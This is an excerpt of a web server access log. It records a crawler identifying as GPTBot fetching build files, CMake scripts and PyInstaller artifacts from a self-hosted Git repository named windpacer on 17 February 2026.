-] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:15:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10639] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" -[17/Feb/2026:15:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 69316] [Gzip 17.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:15:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11621] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10639] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" -[17/Feb/2026:15:50:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 16418] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" -[17/Feb/2026:15:50:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11618] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build" -[17/Feb/2026:15:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10634] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" -[17/Feb/2026:15:50:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 10917] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:15:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 70871] [Gzip 17.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:15:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11621] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 9925] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:15:50:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 97752] [Gzip 28.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:15:50:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:50:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:15:50:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:50:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10203] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:50:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:50:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 14238122] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:15:50:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:15:50:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:50:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 98931] [Gzip 28.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:15:50:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:15:50:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:50:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10431] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11045] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11047] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:50:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11047] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17041] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12948] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10972] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:50:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10971] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10971] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 10305] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:50:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 10306] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:50:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11900] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:15:50:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10222] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:15:50:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 10305] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:50:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:50:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:15:50:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17969] [Gzip 11.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:15:50:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:15:50:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:15:50:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12884] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:15:50:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9988] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:15:50:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9990] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:15:50:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11088] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:50:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] 